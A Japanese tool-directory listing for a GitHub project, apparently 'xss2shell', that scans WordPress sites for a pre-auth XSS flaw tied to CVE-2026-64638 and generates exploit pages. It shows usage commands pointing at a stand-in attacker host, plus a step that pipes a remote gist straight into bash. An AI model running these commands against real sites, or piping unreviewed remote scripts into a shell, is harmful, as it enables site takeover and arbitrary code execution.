Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-64638 — CVE-2026-64638 - 下書きまたはTODO | Kitploit
ツール/GitHubGitHub/horkimhab/cve-2026-64638
脆弱性スキャナーペイロード生成エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト学習と教育ラボと実践
GitHubhorkimhab/cve-2026-64638

CVE-2026-64638

CVE-2026-64638 - 下書きまたはTODO

リポジトリを見る
151ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-64638

寄付

PayPalまたは下のQRコードをスキャンして、このプロジェクトのメンテナンスを支援してください。

paypal

寄付用QRコード

⚡ 簡単な使い方

このプロジェクトは、次のような安全かつ許可された環境でのみ使用してください:

  • ローカル仮想マシン
  • Dockerコンテナ
  • 分離されたラボ環境
  • 許可されたペネトレーションテスト環境

セットアップ例:

git clone <repository-url>
cd <repository-name>

# Project use python follow below

# Create a virtual environment
python -m venv venv

# Activate the virtual environment

# macOS / Linux
source venv/bin/activate

# Windows (Git Bash / WSL)
source venv/Scripts/activate

# Install requirments
pip install -r requirements.txt

使用例:

# 1. Scanning Mode - Detect Vulnerable WordPress Sites:

# Scan a single URL
python xss2shell.py scan http://wp-vm.local

# Scan targets from file (one URL per line)
python xss2shell.py scan targets.txt

# Scan with custom settings
python xss2shell.py scan targets.txt --workers 10 --output my_results.json

# 2. Exploit Generation Mode - Create Exploit HTML Files
# Generate exploit for single target
python xss2shell.py exploit http://wp-vm.local --attacker-url http://attacker-vm.local

# Generate exploits for multiple targets from file
python xss2shell.py exploit targets.txt --attacker-url http://attacker-vm.local --output-dir exploits/

# Specify admin username
python xss2shell.py exploit http://wp-vm.local --attacker-url http://attacker-vm.local --admin-user administrator

注記:

  • 他のプロジェクトからクローンした場合は、curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y を実行して、ネストされた .git ディレクトリをクリアする必要があります。
  • 例: cve-2025-46822.sh, cve-2025-46822-lab.sh, ...

クレジット/参考文献

  • https://thehackernews.com/2026/08/new-wordpress-pre-auth-xss-could-lead.html
  • https://pwn.ai/blog/xss2shell

📚 教育用セキュリティ研究リポジトリ

管理された環境でサイバーセキュリティの概念を学び、テストし、研究するためのリポジトリです。


⚠️ セキュリティおよび法的免責事項

目的

このリポジトリは、教育および許可されたセキュリティ研究のみを目的としています。

ユーザーが次のことについて学ぶのに役立つように設計されています:

  • セキュリティ脆弱性
  • サンドボックスと分離の概念
  • 安全なコーディングと防御的な実践

許可された使用のみ

このリポジトリは、次のような許可のある環境でのみ使用してください:

  • 個人用ラボまたは仮想マシン
  • Dockerまたは分離された環境
  • 許可されたペネトレーションテスト
  • サイバーセキュリティトレーニングまたは学術研究

無許可または違法な使用は固く禁止されています。


免責事項

著者および貢献者は、このプロジェクトによって引き起こされた損害、誤用、法的問題、または損失について責任を負いません。

このリポジトリを使用することにより、以下に同意したものとみなされます:

  • 自分の行動に責任を負うこと
  • 法的かつ倫理的に使用すること
  • プロジェクトは保証なしで提供されること

倫理的な使用

このプロジェクトは次の目的を意図しています:

  • 防御的セキュリティ研究
  • サイバーセキュリティ教育
  • 脆弱性への認識向上
  • 安全なシステムおよびソフトウェア研究

責任ある情報開示の慣行に従い、適用されるすべての法律を遵守してください。


連絡先

責任ある情報開示やコラボレーションについては、GitHubを通じてリポジトリのメンテナーに連絡してください。

ツールをダウンロード